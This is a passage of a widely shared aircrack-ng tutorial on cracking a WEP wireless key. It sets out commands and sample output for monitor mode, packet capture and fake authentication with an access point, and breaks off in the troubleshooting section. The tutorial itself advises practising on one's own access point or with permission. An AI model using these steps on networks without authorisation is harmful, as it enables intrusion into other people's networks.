aircrack_tutorial.pdf

Version: 1.08 May 9, 2008

By: darkAudax

This tutorial walks you though a very simple case to crack a WEP key. It is intended to build

your basic skills and get you familiar with the concepts. It assumes you have a working

wireless card with drivers already patched for injection.

For a start to finish newbie guide, see the Linux Newbie Guide . Although this tutorial does not

cover all the steps, it does attempt to provide much more detailed examples of the steps to

actually crack a WEP key plus explain the reason and background of each step. For more

information on installing aircrck-ng, see Installing Aircrack-ng and for installing drivers see

Installing Drivers .

It is recommended that you experiment with your home wireless access point to get familiar

with these ideas and techniques. If you do not own a particular access point, please

remember to get permission from the owner prior to playing with it.

I would like to acknowledge and thank the Aircrack-ng team [http://trac.aircrack-ng.org

/wiki/Team] for producing such a great robust tool.

Please send me any constructive feedback, positive or negative. Additional troubleshooting

ideas and tips are especially welcome.

First, this solution assumes:

You are using drivers patched for injection. Use the injection test to confirm your card can

inject prior to proceeding.

You are physically close enough to send and receive access point packets. Remember that

just because you can receive packets from the access point does not mean you may will be

able to transmit packets to the AP. The wireless card strength is typically less then the AP

strength. So you have to be physically close enough for your transmitted packets to reach

and be received by the AP. You should confirm that you can communicate with the specific

AP by following these instructions .

There is at least one wired or wireless client connected to the network and they are active.

The reason is that this tutorial depends on receiving at least one ARP request packet and

if there are no active clients then there will never be any ARP request packets.

You are using v0.9 of aircrack-ng. If you use a different version then some of the comman

options may have to be changed.

Ensure all of the above assumptions are true, otherwise the advice that follows will not work.

In the examples below, you will need to change “ath0” to the interface name which is specific

to your wireless card.

In this tutorial, here is what was used:

MAC address of PC running aircrack-ng suite: 00:0F:B5:88:AC:82

BSSID (MAC address of access point): 00:14:6C:7E:40:80

ESSID (Wireless network name): teddy

Access point channel: 9

Wireless interface: ath0

You should gather the equivalent information for the network you will be working on. Then

just change the values in the examples below to the specific network.

Solution Overview

To crack the WEP key for an access point, we need to gather lots of initialization vectors

(IVs). Normal network traffic does not typically generate these IVs very quickly. Theoretically,

if you are patient, you can gather sufficient IVs to crack the WEP key by simply listening to

the network traffic and saving them. Since none of us are patient, we use a technique called

injection to speed up the process. Injection involves having the access point (AP) resend

selected packets over and over very rapidly. This allows us to capture a large number of IVs

in a short period of time.

Once we have captured a large number of IVs, we can use them to determine the WEP key.

Here are the basic steps we will be going through:

Start the wireless interface in monitor mode on the specific AP channel

Use aireplay-ng to do a fake authentication with the access point

Start airodump-ng on AP channel with a bssid filter to collect the new unique IVs

Start aireplay-ng in ARP request replay mode to inject packets

Run aircrack-ng to crack key using the IVs collected

Step 1 - Start the wireless interface in monitor mode on AP channel

The purpose of this step is to put your card into what is called monitor mode. Monitor mode is

mode whereby your card can listen to every packet in the air. Normally your card will only

“hear” packets addressed to you. By hearing every packet, we can later select some for

injection. As well, only (there are some rare exceptions) monitor mode allows you to inject

packets. (Note: this procedure is different for non-Atheros cards.)

First stop ath0 by entering:

airmon-ng stop ath0

The system responds:

Interface Chipset Driver

wifi0 Atheros madwifi-ng

ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)

Enter “iwconfig” to ensure there are no other athX interfaces. It should look similar to this:

lo no wireless extensions.

eth0 no wireless extensions.

wifi0 no wireless extensions.

If there are any remaining athX interfaces, then stop each one. When you are finished, run

“iwconfig” to ensure there are none left.

Now, enter the following command to start the wireless card on channel 9 in monitor mode:

airmon-ng start wifi0 9

Note: In this command we use “wifi0” instead of our wireless interface of “ath0”. This is

because the madwifi-ng drivers are being used.

The system will respond:

Interface Chipset Driver

wifi0 Atheros madwifi-ng

ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)

You will notice that “ath0” is reported above as being put into monitor mode.

To confirm the interface is properly setup, enter “iwconfig”.

The system will respond:

lo no wireless extensions.

wifi0 no wireless extensions.

eth0 no wireless extensions.

ath0 IEEE 802.11g ESSID:"" Nickname:""

Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82

Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3

Retry:off RTS thr:off Fragment thr:off

Encryption key:off

Power Management:off

Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm

Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0

Tx excessive retries:0 Invalid misc:0 Missed beacon:0

In the response above, you can see that ath0 is in monitor mode, on the 2.452GHz

frequency which is channel 9 and the Access Point shows the MAC address of your wireless

card. Please note that only the madwifi-ng drivers show the MAC address of your wireless

card, the other drivers do not do this. So everything is good. It is important to confirm all this

information prior to proceeding, otherwise the following steps will not work properly.

To match the frequency to the channel, check out: http://www.rflinx.com/help/calculations

/#2.4ghz_wifi_channels [http://www.rflinx.com/help/calculations/#2.4ghz_wifi_channels] then select

the “Wifi Channel Selection and Channel Overlap” tab. This will give you the frequency for

each channel.

Step 2 - Start airodump-ng to capture the IVs

The purpose of this step is to capture the IVs generated. This step starts airodump-ng to

capture the IVs from the specific access point.

Open another console session to capture the generated IVs. Then enter:

airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0

Where:

-c 9 is the channel for the wireless network

--bssid 00:14:6C:7E:40:80 is the access point MAC address. This eliminate extraneous

traffic.

-w capture is file name prefix for the file which will contain the IVs.

ath0 is the interface name.

While the injection is taking place (later), the screen will look similar to this:

CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 42 100 5240 178307 338 9 54 WEP WEP teddy

BSSID STATION PWR Lost Packets Probes

00:14:6C:7E:40:80 00:0F:B5:88:AC:82 42 0 183782

Step 3 - Use aireplay-ng to do a fake authentication with the access point

In order for an access point to accept a packet, the source MAC address must already be

associated. If the source MAC address you are injecting is not associated then the AP ignores

the packet and sends out a “DeAuthentication” packet in cleartext. In this state, no new IVs

are created because the AP is ignoring all the injected packets.

The lack of association with the access point is the single biggest reason why injection fails.

Remember the golden rule: The MAC you use for injection must be associated with the AP by

either using fake authentication or using a MAC from an already-associated client.

To associate with an access point, use fake authentication:

aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0

Where:

-1 means fake authentication

0 reassociation timing in seconds

-e teddy is the wireless network name

-a 00:14:6C:7E:40:80 is the access point MAC address

-h 00:0F:B5:88:AC:82 is our card MAC addresss

ath0 is the wireless interface name

Success looks like:

18:18:20 Sending Authentication Request

18:18:20 Authentication successful

18:18:20 Sending Association Request

18:18:20 Association successful :-)

Or another variation for picky access points:

aireplay-ng -1 6000 -o 1 -q 10 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0

Where:

6000 - Reauthenticate every 6000 seconds. The long period also causes keep alive

packets to be sent.

-o 1 - Send only one set of packets at a time. Default is multiple and this confuses some

APs.

-q 10 - Send keep alive packets every 10 seconds.

Success looks like:

18:22:32 Sending Authentication Request

18:22:32 Authentication successful

18:22:32 Sending Association Request

18:22:32 Association successful :-)

18:22:42 Sending keep-alive packet

18:22:52 Sending keep-alive packet

# and so on.

Here is an example of what a failed authentication looks like:

8:28:02 Sending Authentication Request

18:28:02 Authentication successful

18:28:02 Sending Association Request

18:28:02 Association successful :-)

18:28:02 Got a deauthentication packet!

18:28:05 Sending Authentication Request

18:28:05 Authentication successful

18:28:05 Sending Association Request

18:28:10 Sending Authentication Request

18:28:10 Authentication successful

18:28:10 Sending Association Request

Notice the “Got a deauthentication packet” and the continuous retries above. Do not proceed

to the next step until you have the fake authentication running correctly.

Troubleshooting Tips

Some access points are configured to only allow selected MAC addresses to associate and

connect. If this is the case, you will not be able to successfully do fake authentication

unless you know one of the MAC addresses on the allowed list. If you suspect this is the

Plik z chomika:

Inne pliki z tego folderu:

Inne foldery tego chomika: